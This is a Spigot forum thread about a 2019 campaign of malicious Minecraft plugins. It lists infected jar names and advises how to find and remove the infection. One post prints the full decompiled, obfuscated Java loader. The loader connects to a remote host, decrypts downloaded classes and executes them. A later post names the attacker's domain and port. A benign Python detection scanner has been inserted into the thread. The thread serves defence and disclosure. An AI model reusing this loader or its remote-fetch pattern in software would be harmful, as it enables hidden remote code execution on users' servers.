List of Found Malware

Discussion in 'Spigot Plugin Help' started by Optic_Fusion1, Aug 10, 2019.

  1. Edit: My AntiMalware detects this malware & over 200 other malicious plugins

    Recently there have been a variety of malicious uploads of the same malware.
    This malware adds code to the server jar with the class path of org/bukkit/util/io/Jtoc.class or similar.
    Normally I wouldn't make these types of threads; however, since this affects the server jar and staff are slow to respond to reports, I figured making this was a good idea.
    To find this malware manually you'll want to use a decompiler (I find JByteMod works perfectly for this one) and look for the class with the "findClass" method. If it has that, it's probably malicious.
    The jar names to check are the following:
    Timber.jar
    TakeAim.jar
    StorageShelfs.jar
    Shout! chat.jar
    reporter-v2.jar
    Plugs.jar
    PingTest.jar
    NOPE!.jar
    JoinMessageBlocker.jar
    HandRefiller.jar
    Fly.jar
    Feed.jar
    FairEXP.jar
    EntityBlood.jar
    EasyShops2.0.jar
    EasyDeaths.jar
    DeadChest.jar
    CustomCraft.jar
    ConsoleControl.jar
    ChainArmor.jar
    BetterBookshelfs.jar
    AutoItemReload-v1.6.jar
    AutoItemReload.jar
    AnimatedMOTD.jar
    brewery-1.8.jar
    Reequip.jar
    CampfireRecipes.jar
    PingTest.jar
    SaveMyItems.jar

    MD5 checksum list:
     
    #1 Optic_Fusion1, Aug 10, 2019
    Last edited: Apr 23, 2021
  2. And if it wasn't obvious from "it affects the server jar": if you DO have the malware you MUST delete the infected plugin and replace the server jar with a newly built one.
     
    #2 Optic_Fusion1, Aug 10, 2019
    Last edited: Sep 26, 2019
  3. Glare (previously ItsMeGlare)

  4. Yes, however it's heavily out of date, doesn't get updates, and detects very little malware outside of ForceOPs.
    So I heavily suggest using my AntiMalware since it gets updates (mainly database updates; however, I'm working on a rewrite for V5). The rewrite will also fix an issue with it NOT properly detecting this sort of malware (plus it will detect 110 other malicious plugins in total after the rewrite, and will grow as more malware gets published to Spigot).
     
  5. Glare (previously ItsMeGlare)

    Looking forward to it!
     
  6. I'll also use this as an opportunity to say this.
    If you find a malicious plugin dm it to me.
    I'll be able to update my AntiMalware if you do.
     
  7. These listed jars were all spigotmc hosted plugins?
     
  8. Indeed, I reported most of them myself.
    They usually stayed up for a few hours to a day+ though, even after reporting them.
     
  9. These were all plugins uploaded by different people?

    What does the malware do?
     
  10. They were most likely alts.
    As for what it does, it downloads and executes a malicious jar from a 3rd-party website.
    It also modifies the server.jar to add malicious code, which was brought up in the OP.
     
  11. As for the malicious code itself, it's always a variation of the following:
    Code (Text):

    /*
    * Illegal identifiers - consider using --renameillegalidents true
    */
    public final class \u2001
    extends ClassLoader {
        private /* synthetic */ Map<String, Class<?>> \u2002;
        private /* synthetic */ Map<String, byte[]> \u2003;
        public static final /* synthetic */ boolean \u2004;

        /*
         * Unable to fully structure code
         */
        public final void \u2004() {
            try {
                var1_1 = Cipher.getInstance((String)\u2000.\u2003((String)"\u9557\u9553\u9545", (int)-1026517738));
                v0 = new byte[-295882746 ^ -295882730];
                v0[-931940953 ^ -931940953] = -1098860341 ^ -1098860325;
                v0[-638773133 ^ -638773134] = -907155858 ^ -907155961;
                v0[-445928176 ^ -445928174] = -1683403140 ^ 1683403205;
                v0[-1507965502 ^ -1507965503] = -2114810239 ^ -2114810117;
                v0[1416267215 ^ 1416267211] = 485231374 ^ -485231368;
                v0[-1156570466 ^ -1156570469] = -223645556 ^ -223645547;
                v0[-1613121302 ^ -1613121300] = -1823356931 ^ -1823356969;
                v0[-1660085159 ^ -1660085154] = 1736611736 ^ 1736611819;
                v0[521103091 ^ 521103099] = -1721889310 ^ -1721889384;
                v0[-1101408481 ^ -1101408490] = 1538028923 ^ -1538028910;
                v0[199548933 ^ 199548943] = -267659524 ^ -267659545;
                v0[464781751 ^ 464781756] = 1305198386 ^ -1305198462;
                v0[2117382728 ^ 2117382724] = 2248946 ^ -2248936;
                v0[-793067839 ^ -793067828] = 442328199 ^ -442328243;
                v0[1817172676 ^ 1817172682] = -87177455 ^ -87177352;
                v0[1748328588 ^ 1748328579] = -1641080670 ^ -1641080698;
                var1_1.init(406466958 ^ 406466956, (Key)new SecretKeySpec(v0, 1033142390 ^ 1033142390, 1985306537 ^ 1985306553, \u2000.\u2003((String)"\u5752\u5756\u5740", (int)-238790893)));
                var2_3 = null;
                try {
                    block28 : {
                        var3_4 = new ZipInputStream((InputStream)new CipherInputStream(new Socket(new String(Base64.getDecoder().decode(\u2000.\u2003((String)"\u437d\u4341\u435b\u4372\u4340\u4341\u434b\u4375\u4357\u435e\u4361\u4369\u4343\u4374\u434c\u436c\u437c\u4351\u4375\u432f", (int)217269017))), 357831313 ^ 357830667).getInputStream(), var1_1));
                        var4_6 = null;
                        try {
                            while ((var5_7 = var3_4.getNextEntry()) != null) {
                                if (var5_7.isDirectory()) {
                                    if (!\u2001.\u2004) continue;
                                    throw null;
                                }
                                var6_10 = new ByteArrayOutputStream();
                                var7_11 = new byte[-1504340926 ^ -1504341950];
                                while ((var8_12 = var3_4.read(var7_11)) > 0) {
                                    var6_10.write(var7_11, 762669250 ^ 762669250, var8_12);
                                    if (!\u2001.\u2004) continue;
                                    throw null;
                                }
                                var9_13 = var5_7.getName();
                                var10_14 = var6_10.toByteArray();
                                if (var9_13.endsWith(\u2000.\u2003((String)"\uda3f\uda72\uda7d\uda70\uda62\uda62", (int)-2089100783))) {
                                    this.\u2003.put((Object)var9_13.substring(228966171 ^ 228966171, var9_13.lastIndexOf(-1479016577 ^ -1479016623)).replace((char)(1102107222 ^ 1102107257), (char)(-1789535088 ^ -1789535042)), (Object)var10_14);
                                    if (\u2001.\u2004) {
                                        throw null;
                                    }
                                } else if (var9_13.equals((Object)\u2000.\u2003((String)"\u1114\u111c\u110d\u1118\u1174\u1110\u1117\u111f\u1176\u1114\u1118\u1117\u1110\u111f\u111c\u110a\u110d\u1177\u1114\u111f", (int)840962393))) {
                                    var11_15 = new String(var10_14);
                                    var12_16 = var11_15.split(\u2000.\u2003((String)"\uadd6", (int)1362210268));
                                    var13_17 = var12_16.length;
                                    for (var14_18 = -655463381 ^ -655463381; var14_18 < var13_17; ++var14_18) {
                                        var15_19 = var12_16[var14_18];
                                        if (!var15_19.startsWith(\u2000.\u2003((String)"\u8484\u84a8\u84a0\u84a7\u84e4\u848a\u84a5\u84a8\u84ba\u84ba\u84f3\u84e9", (int)-97942327))) {
                                            if (!\u2001.\u2004) continue;
                                            throw null;
                                        }
                                        var2_3 = var15_19.replace((CharSequence)\u2000.\u2003((String)"\u8253\u827f\u8277\u8270\u8233\u825d\u8272\u827f\u826d\u826d\u8224\u823e", (int)-1263500770), (CharSequence)\u2000.\u2003((String)"", (int)1176517957)).replace((CharSequence)\u2000.\u2003((String)"\ucf18", (int)1425461013), (CharSequence)\u2000.\u2003((String)"", (int)1173404379)).replace((CharSequence)\u2000.\u2003((String)"\ud5c3", (int)-2107648567), (CharSequence)\u2000.\u2003((String)"", (int)1935636255));
                                        if (!\u2001.\u2004) break;
                                        throw null;
                                    }
                                }
                                if (!\u2001.\u2004) continue;
                                throw null;
                            }
                            v1 = new Class[-792448108 ^ -792448107];
                            v1[-1068148723 ^ -1068148723] = String[].class;
                            v2 = new Object[1444527654 ^ 1444527655];
                            v2[-145382113 ^ -145382113] = new String[-978086432 ^ -978086432];
                            this.findClass(var2_3).getMethod(\u2000.\u2003((String)"\ud90d\ud901\ud909\ud90e", (int)-234235552), v1).invoke((Object)null, v2);
                            ** if (!\u2001.\u2004) goto lbl-1000
                        }
                        catch (Throwable var5_9) {
                            var4_6 = var5_9;
                            throw var5_9;
                        }
                        finally {
                            if (var3_4 == null) break block28;
                            if (var4_6 != null) {
                                try {
                                    var3_4.close();
                                    ** if (!\u2001.\u2004) goto lbl-1000
                                }
                                catch (Throwable var5_8) {
                                    var4_6.addSuppressed(var5_8);
                                    if (\u2001.\u2004) {
                                        throw null;
                                    }
                                    break block28;
                                }
    lbl-1000: // 1 sources:
                                {
                                    throw null;
                                }
    lbl-1000: // 1 sources:
                                {
                                    break block28;
                                }
                            }
                            var3_4.close();
                        }
    lbl-1000: // 1 sources:
                        {
                            throw null;
                        }
    lbl-1000: // 1 sources:
                        {
                        }
                    }
                    ** if (!\u2001.\u2004) goto lbl-1000
                }
                catch (Throwable var3_5) {
                    Thread.sleep((long)(4083438937477440096L ^ 4083438937477420880L));
                    this.\u2004();
                }
    lbl-1000: // 1 sources:
                {
                    throw null;
                }
    lbl-1000: // 1 sources:
                {
                }
                ** if (!\u2001.\u2004) goto lbl-1000
            }
            catch (Throwable var1_2) {
                // empty catch block
            }
    lbl-1000: // 1 sources:
            {
                throw null;
            }
    lbl-1000: // 1 sources:
            {
            }
        }

        public final void \u2005() {
            new Thread(this::\u2004).start();
        }

        private void \u2006(String string, byte[] arrby) {
            this.\u2002.put((Object)string, (Object)this.defineClass(string, arrby, 770185465 ^ 770185465, arrby.length));
        }

        public \u2001() {
            this.\u2003 = new HashMap();
            this.\u2002 = new HashMap();
        }

        protected Class<?> findClass(String string) throws ClassNotFoundException {
            if (!this.\u2002.containsKey((Object)string)) {
                if (!this.\u2003.containsKey((Object)string)) {
                    throw new ClassNotFoundException(string);
                }
                this.\u2006(string, (byte[])this.\u2003.get((Object)string));
            }
            return (Class)this.\u2002.get((Object)string);
        }
    }
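
A defender-side check for the traits described in post 1 (a class with its own "findClass" method, i.e. a custom ClassLoader) and visible in the decompiled loader in post 11 (Cipher and Socket use, class and field names made of Unicode space characters such as \u2001), as an added Python example that is not part of this thread or of the AntiMalware plugin: it walks the constant pool of each .class entry in a jar and reports which indicators it sees. The indicator list is an assumption drawn from the decompiled code above, not a complete signature, and build_class only constructs a minimal sample class file so the parser can be exercised offline.

```python
import struct
import zipfile

_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,  # constant-pool tag -> payload
          15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}                          # size; Utf8 (tag 1) is variable
SUSPECT_API = ("findClass", "defineClass", "javax/crypto/Cipher", "java/net/Socket")  # used by the loader above

def parse_class(data):
    """Return (this_name, super_name, set of Utf8 constants) from a .class file's constant pool."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count, pos, idx, utf8, cls = struct.unpack_from(">H", data, 8)[0], 10, 1, {}, {}
    while idx < count:
        tag, pos = data[pos], pos + 1
        if tag == 1:
            n = struct.unpack_from(">H", data, pos)[0]
            utf8[idx] = data[pos + 2:pos + 2 + n].decode("utf-8", "replace")
            pos += 2 + n
        else:
            if tag == 7:  # CONSTANT_Class -> index of the Utf8 holding the internal name
                cls[idx] = struct.unpack_from(">H", data, pos)[0]
            pos += _FIXED[tag]
        idx += 2 if tag in (5, 6) else 1  # Long/Double take two pool slots
    this_i, super_i = struct.unpack_from(">HH", data, pos + 2)  # skip access_flags
    return utf8.get(cls.get(this_i), ""), utf8.get(cls.get(super_i), ""), set(utf8.values())

def class_findings(data):
    this_name, super_name, consts = parse_class(data)
    found = ["extends ClassLoader"] if super_name == "java/lang/ClassLoader" else []
    found += ["references " + api for api in SUSPECT_API if api in consts]
    simple = this_name.rsplit("/", 1)[-1]
    if simple and all(0x2000 <= ord(c) <= 0x200F for c in simple):  # \u2001-style "illegal identifiers"
        found.append("class name is only Unicode space characters")
    return this_name, found

def scan_jar(path):
    # Map each flagged .class entry of a plugin or server jar to its indicators (empty dict = nothing found)
    with zipfile.ZipFile(path) as z:
        hits = {e: class_findings(z.read(e))[1] for e in z.namelist() if e.endswith(".class")}
    return {e: f for e, f in hits.items() if f}

def build_class(this_name, super_name, extra_utf8=()):
    """Constructed sample input: a minimal, method-less class file, only to exercise the parser offline."""
    pool = []
    add = lambda tag, payload: pool.append(bytes([tag]) + payload) or len(pool)  # 1-based pool index
    utf8 = lambda s: add(1, struct.pack(">H", len(s.encode())) + s.encode())
    klass = lambda s: add(7, struct.pack(">H", utf8(s)))
    this_i, super_i = klass(this_name), klass(super_name)
    [utf8(s) for s in extra_utf8]
    header = b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + struct.pack(">H", len(pool) + 1)
    return header + b"".join(pool) + struct.pack(">7H", 0x31, this_i, super_i, 0, 0, 0, 0)
```

Run scan_jar on a plugin jar or on the server jar itself; a class that extends ClassLoader and also references Cipher and Socket is the one worth opening in a decompiler as post 1 describes, while a lone "references findClass" hit can be a legitimate plugin loader.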
     
     
  12. Maybe notify the abuse contact of the web host?
     
  13. Yeah, probably should, huh.
    I'll have to re-get the website URL.
    Though I usually suck at this sorta stuff ;-;

    edit:
    The website is update4life.xyz. You have to connect on port 666, however; otherwise it redirects you to a YouTube video.
     
    #14 Optic_Fusion1, Aug 11, 2019
    Last edited: Aug 11, 2019
  14. :911 have fun.
     
  15. Still port 666, for the malware anyways
     
  16. I wonder what it effectively does, bitcoin machine?
     
  17. Wouldn't be surprised if that's the case honestly; I haven't really spent time trying to look at the payload myself though.
     
  18. What AnimatedMOTD plugin was it? I may have downloaded and run one by accident...